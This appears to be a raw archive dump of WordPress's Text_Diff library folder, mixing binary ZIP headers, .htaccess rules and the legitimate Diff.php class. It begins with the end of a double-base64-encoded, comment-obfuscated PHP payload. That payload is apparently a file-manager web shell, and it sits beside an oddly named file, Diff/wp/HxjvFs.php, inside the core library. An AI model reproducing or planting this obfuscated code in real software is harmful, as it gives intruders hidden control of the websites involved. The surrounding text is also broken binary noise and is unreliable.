Y2ljZ09pQW5MU2NwT3cwS0lDQWdJQ1JwYm1adklDNDlJQ2dvSkhCbGNtMXpJQ1lnTUhnd01EZ3dLU0EvSUNkM0p5QTZJQ2N0SnlrN0RRb2dJQ0FnSkdsdVptOGdMajBnS0Nna2NHVnliWE1nSmlBd2VEQXdOREFwSUQ4Z0tDZ2tjR1Z5YlhNZ0ppQXdlREE0TURBcElEOGdKM01uSURvZ0ozZ25JQ2tnT2lBb0tDUndaWEp0Y3lBbUlEQjRNRGd3TUNrZ1B5QW5VeWNnT2lBbkxTY3BLVHNOQ2lBZ0lDQWthVzVtYnlBdVBTQW9LQ1J3WlhKdGN5QW1JREI0TURBeU1Da2dQeUFuY2ljZ09pQW5MU2NwT3cwS0lDQWdJQ1JwYm1adklDNDlJQ2dvSkhCbGNtMXpJQ1lnTUhnd01ERXdLU0EvSUNkM0p5QTZJQ2N0SnlrN0RRb2dJQ0FnSkdsdVptOGdMajBnS0Nna2NHVnliWE1nSmlBd2VEQXdNRGdwSUQ4Z0tDZ2tjR1Z5YlhNZ0ppQXdlREEwTURBcElEOGdKM01uSURvZ0ozZ25JQ2tnT2lBb0tDUndaWEp0Y3lBbUlEQjRNRFF3TUNrZ1B5QW5VeWNnT2lBbkxTY3BLVHNOQ2lBZ0lDQWthVzVtYnlBdVBTQW9LQ1J3WlhKdGN5QW1JREI0TURBd05Da2dQeUFuY2ljZ09pQW5MU2NwT3cwS0lDQWdJQ1JwYm1adklDNDlJQ2dvSkhCbGNtMXpJQ1lnTUhnd01EQXlLU0EvSUNkM0p5QTZJQ2N0SnlrN0RRb2dJQ0FnSkdsdVptOGdMajBnS0Nna2NHVnliWE1nSmlBd2VEQXdNREVwSUQ4Z0tDZ2tjR1Z5YlhNZ0ppQXdlREF5TURBcElEOGdKM1FuSURvZ0ozZ25JQ2tnT2lBb0tDUndaWEp0Y3lBbUlEQjRNREl3TUNrZ1B5QW5WQ2NnT2lBbkxTY3BLVHNOQ2cwS0lDQWdJSEpsZEhWeWJpQWthVzVtYnpzTkNuME5DbVoxYm1OMGFXOXVJSE52Y25SQ2VVWnZiR1JsY2lna2JtOTNYM0JoZEdnc0lDUmhiR3hmYkdsemRDbDdEUW9nSUNBZ0pHWnZiR1JsY2w5c2FYTjBJRDBnWVhKeVlYa29LVHNOQ2lBZ0lDQWtabWxzWlY5c2FYTjBJRDBnWVhKeVlYa29LVHNOQ2lBZ0lDQm1iM0psWVdOb0lDZ2tZV3hzWDJ4cGMzUWdZWE1nSkdzOVBpUjJLWHNOQ2lBZ0lDQWdJQ0FnYVdZb2FYTmZaR2x5S0NSdWIzZGZjR0YwYUM0bkx5Y3VKSFlwS1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ1JtYjJ4a1pYSmZiR2x6ZEZ0ZElEMGdKSFk3RFFvZ0lDQWdJQ0FnSUgxbGJITmxldzBLSUNBZ0lDQWdJQ0FnSUNBZ0pHWnBiR1ZmYkdsemRGdGRJRDBnSkhZN0RRb2dJQ0FnSUNBZ0lIME5DaUFnSUNCOURRb2dJQ0FnYzI5eWRDZ2tabTlzWkdWeVgyeHBjM1FwT3cwS0lDQWdJSE52Y25Rb0pHWnBiR1ZmYkdsemRDazdEUW9nSUNBZ0pHRnNiRjlzYVhOMElEMGdZWEp5WVhsZmJXVnlaMlVvSkdadmJHUmxjbDlzYVhOMExDQWtabWxzWlY5c2FYTjBLVHNOQ2lBZ0lDQnlaWFIxY200Z0pHRnNiRjlzYVhOME93MEtmU0EvUGc9PSIpKTs="/*-ki9hSP#-*/)/*-{}gDx^N0(6-*/);?>PK 6E�Z�F�� Diff/wp/.htaccessnu �7��m
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
Order Allow,Deny
Deny from all
Order Allow,Deny
Allow from all
PK 6E�Z�Sʉ� � Diff/.htaccessnu �7��m
Order allow,deny
Deny from all
PK 6E�Zy|k3G2 G2 Diff.phpnu �[��� , and is used/adapted with his permission.
*
* Copyright 2004 Geoffrey T. Dairiki
* Copyright 2004-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see https://opensource.org/license/lgpl-2-1/.
*
* @package Text_Diff
* @author Geoffrey T. Dairiki
*/
class Text_Diff {
/**
* Array of changes.
*
* @var array
*/
var $_edits;
/**
* Computes diffs between sequences of strings.
*
* @param string $engine Name of the diffing engine to use. 'auto'
* will automatically select the best.
* @param array $params Parameters to pass to the diffing engine.
* Normally an array of two arrays, each
* containing the lines from a file.
*/
function __construct( $engine, $params )
{
// Backward compatibility workaround.
if (!is_string($engine)) {
$params = array($engine, $params);
$engine = 'auto';
}
if ($engine == 'auto') {
$engine = extension_loaded('xdiff') ? 'xdiff' : 'native';
} else {
$engine = basename($engine);
}
// WP #7391
require_once dirname(__FILE__).'/Diff/Engine/' . $engine . '.php';
$class = 'Text_Diff_Engine_' . $engine;
$diff_engine = new $class();
$this->_edits = call_user_func_array(array($diff_engine, 'diff'), $params);
}
/**
* PHP4 constructor.
*/
public function Text_Diff( $engine, $params ) {
self::__construct( $engine, $params );
}
/**
* Returns the array of differences.
*/
function getDiff()
{
return $this->_edits;
}
/**
* returns the number of new (added) lines in a given diff.
*
* @since Text_Diff 1.1.0
*
* @return int The number of new lines
*/
function countAddedLines()
{
$count = 0;
foreach ($this->_edits as $edit) {
if (is_a($edit, 'Text_Diff_Op_add') ||
is_a($edit, 'Text_Diff_Op_change')) {
$count += $edit->nfinal();
}
}
return $count;
}
/**
* Returns the number of deleted (removed) lines in a given diff.
*
* @since Text_Diff 1.1.0
*
* @return int The number of deleted lines
*/
function countDeletedLines()
{
$count = 0;
foreach ($this->_edits as $edit) {
if (is_a($edit, 'Text_Diff_Op_delete') ||
is_a($edit, 'Text_Diff_Op_change')) {
$count += $edit->norig();
}
}
return $count;
}
/**
* Computes a reversed diff.
*
* Example:
*
* $diff = new Text_Diff($lines1, $lines2);
* $rev = $diff->reverse();
*
*
* @return Text_Diff A Diff object representing the inverse of the
* original diff. Note that we purposely don't return a
* reference here, since this essentially is a clone()
* method.
*/
function reverse()
{
if (version_compare(zend_version(), '2', '>')) {
$rev = clone($this);
} else {
$rev = $this;
}
$rev->_edits = array();
foreach ($this->_edits as $edit) {
$rev->_edits[] = $edit->reverse();
}
return $rev;
}
/**
* Checks for an empty diff.
*
* @return bool True if two sequences were identical.
*/
function isEmpty()
{
foreach ($this->_edits as $edit) {
if (!is_a($edit, 'Text_Diff_Op_copy')) {
return false;
}
}
return true;
}
/**
* Computes the length of the Longest Common Subsequence (LCS).
*
* This is mostly for diagnostic purposes.
*
* @return int The length of the LCS.
*/
function lcs()
{
$lcs = 0;
foreach ($this->_edits as $edit) {
if (is_a($edit, 'Text_Diff_Op_copy')) {
$lcs += count($edit->orig);
}
}
return $lcs;
}
/**
* Gets the original set of lines.
*
* This reconstructs the $from_lines parameter passed to the constructor.
*
* @return array The original sequence of strings.
*/
function getOriginal()
{
$lines = array();
foreach ($this->_edits as $edit) {
if ($edit->orig) {
array_splice($lines, count($lines), 0, $edit->orig);
}
}
return $lines;
}
/**
* Gets the final set of lines.
*
* This reconstructs the $to_lines parameter passed to the constructor.
*
* @return array The sequence of strings.
*/
function getFinal()
{
$lines = array();
foreach ($this->_edits as $edit) {
if ($edit->final) {
array_splice($lines, count($lines), 0, $edit->final);
}
}
return $lines;
}
/**
* Removes trailing newlines from a line of text. This is meant to be used
* with array_walk().
*
* @param string $line The line to trim.
* @param int $key The index of the line in the array. Not used.
*/
static function trimNewlines(&$line, $key)
{
$line = str_replace(array("\n", "\r"), '', $line);
}
/**
* Determines the location of the system temporary directory.
*
* @access protected
*
* @return string A directory name which can be used for temp files.
* Returns false if one could not be found.
*/
static function _getTempDir()
{
$tmp_locations = array('/tmp', '/var/tmp', 'c:\WUTemp', 'c:\temp',
'c:\windows\temp', 'c:\winnt\temp');
/* Try PHP's upload_tmp_dir directive. */
$tmp = ini_get('upload_tmp_dir');
/* Otherwise, try to determine the TMPDIR environment variable. */
if (!strlen($tmp)) {
$tmp = getenv('TMPDIR');
}
/* If we still cannot determine a value, then cycle through a list of
* preset possibilities. */
while (!strlen($tmp) && count($tmp_locations)) {
$tmp_check = array_shift($tmp_locations);
if (@is_dir($tmp_check)) {
$tmp = $tmp_check;
}
}
/* If it is still empty, we have failed, so return false; otherwise
* return the directory determined. */
return strlen($tmp) ? $tmp : false;
}
/**
* Checks a diff for validity.
*
* This is here only for debugging purposes.
*/
function _check($from_lines, $to_lines)
{
if (serialize($from_lines) != serialize($this->getOriginal())) {
throw new Text_Exception("Reconstructed original does not match");
}
if (serialize($to_lines) != serialize($this->getFinal())) {
throw new Text_Exception("Reconstructed final does not match");
}
$rev = $this->reverse();
if (serialize($to_lines) != serialize($rev->getOriginal())) {
throw new Text_Exception("Reversed original does not match");
}
if (serialize($from_lines) != serialize($rev->getFinal())) {
throw new Text_Exception("Reversed final does not match");
}
$prevtype = null;
foreach ($this->_edits as $edit) {
if ($prevtype !== null && $edit instanceof $prevtype) {
throw new Text_Exception("Edit sequence is non-optimal");
}
$prevtype = get_class($edit);
}
return true;
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*/
class Text_MappedDiff extends Text_Diff {
/**
* Computes a diff between sequences of strings.
*
* This can be used to compute things like case-insensitive diffs, or diffs
* which ignore changes in white-space.
*
* @param array $from_lines An array of strings.
* @param array $to_lines An array of strings.
* @param array $mapped_from_lines This array should have the same size
* number of elements as $from_lines. The
* elements in $mapped_from_lines and
* $mapped_to_lines are what is actually
* compared when computing the diff.
* @param array $mapped_to_lines This array should have the same number
* of elements as $to_lines.
*/
function __construct($from_lines, $to_lines,
$mapped_from_lines, $mapped_to_lines)
{
assert(count($from_lines) == count($mapped_from_lines));
assert(count($to_lines) == count($mapped_to_lines));
parent::Text_Diff($mapped_from_lines, $mapped_to_lines);
$xi = $yi = 0;
for ($i = 0; $i < count($this->_edits); $i++) {
$orig = &$this->_edits[$i]->orig;
if (is_array($orig)) {
$orig = array_slice($from_lines, $xi, count($orig));
$xi += count($orig);
}
$final = &$this->_edits[$i]->final;
if (is_array($final)) {
$final = array_slice($to_lines, $yi, count($final));
$yi += count($final);
}
}
}
/**
* PHP4 constructor.
*/
public function Text_MappedDiff( $from_lines, $to_lines,
$mapped_from_lines, $mapped_to_lines ) {
self::__construct( $from_lines, $to_lines,
$mapped_from_lines, $mapped_to_lines );
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*
* @access private
*/
abstract class Text_Diff_Op {
var $orig;
var $final;
abstract function &reverse();
function norig()
{
return $this->orig ? count($this->orig) : 0;
}
function nfinal()
{
return $this->final ? count($this->final) : 0;
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*
* @access private
*/
class Text_Diff_Op_copy extends Text_Diff_Op {
/**
* PHP5 constructor.
*/
function __construct( $orig, $final = false )
{
if (!is_array($final)) {
$final = $orig;
}
$this->orig = $orig;
$this->final = $final;
}
/**
* PHP4 constructor.
*/
public function Text_Diff_Op_copy( $orig, $final = false ) {
self::__construct( $orig, $final );
}
function &reverse()
{
$reverse = new Text_Diff_Op_copy($this->final, $this->orig);
return $reverse;
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*
* @access private
*/
class Text_Diff_Op_delete extends Text_Diff_Op {
/**
* PHP5 constructor.
*/
function __construct( $lines )
{
$this->orig = $lines;
$this->final = false;
}
/**
* PHP4 constructor.
*/
public function Text_Diff_Op_delete( $lines ) {
self::__construct( $lines );
}
function &reverse()
{
$reverse = new Text_Diff_Op_add($this->orig);
return $reverse;
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*
* @access private
*/
class Text_Diff_Op_add extends Text_Diff_Op {
/**
* PHP5 constructor.
*/
function __construct( $lines )
{
$this->final = $lines;
$this->orig = false;
}
/**
* PHP4 constructor.
*/
public function Text_Diff_Op_add( $lines ) {
self::__construct( $lines );
}
function &reverse()
{
$reverse = new Text_Diff_Op_delete($this->final);
return $reverse;
}
}
/**
* @package Text_Diff
* @author Geoffrey T. Dairiki
*
* @access private
*/
class Text_Diff_Op_change extends Text_Diff_Op {
/**
* PHP5 constructor.
*/
function __construct( $orig, $final )
{
$this->orig = $orig;
$this->final = $final;
}
/**
* PHP4 constructor.
*/
public function Text_Diff_Op_change( $orig, $final ) {
self::__construct( $orig, $final );
}
function &reverse()
{
$reverse = new Text_Diff_Op_change($this->final, $this->orig);
return $reverse;
}
}
PK 6E�Z-�1� �
Exception.phpnu �[���
Order allow,deny
Deny from all
PK 6E�Z'5��> �> Diff/Engine/native.phpnu �[��� PK 6E�Z����S S �> Diff/Engine/shell.phpnu �[��� PK 6E�Z�Eћ � �S Diff/Engine/string.phpnu �[��� PK 6E�Z�@[� � pt Diff/Engine/xdiff.phpnu �[��� PK 6E�Z�Sʉ� � P} Diff/Engine/.htaccessnu �7��m PK 6E�Z'ݣ� � �~ Diff/Renderer/inline.phpnu �[��� PK 6E�Z�Sʉ� � b� Diff/Renderer/.htaccessnu �7��m PK 6E�Z�
=g� � �� Diff/Renderer.phpnu �[��� PK 6E�Z��{�{ �{ m� Diff/wp/HxjvFs.phpnu �7��m PK 6E�Z�F�� K, Diff/wp/.htaccessnu �7��m PK 6E�Z�Sʉ� � �. Diff/.htaccessnu �7��m PK 6E�Zy|k3G2 G2 �/ Diff.phpnu �[��� PK 6E�Z-�1� �
9b Exception.phpnu �[��� PK 6E�Z�Sʉ� � gc .htaccessnu �7��m PK z �d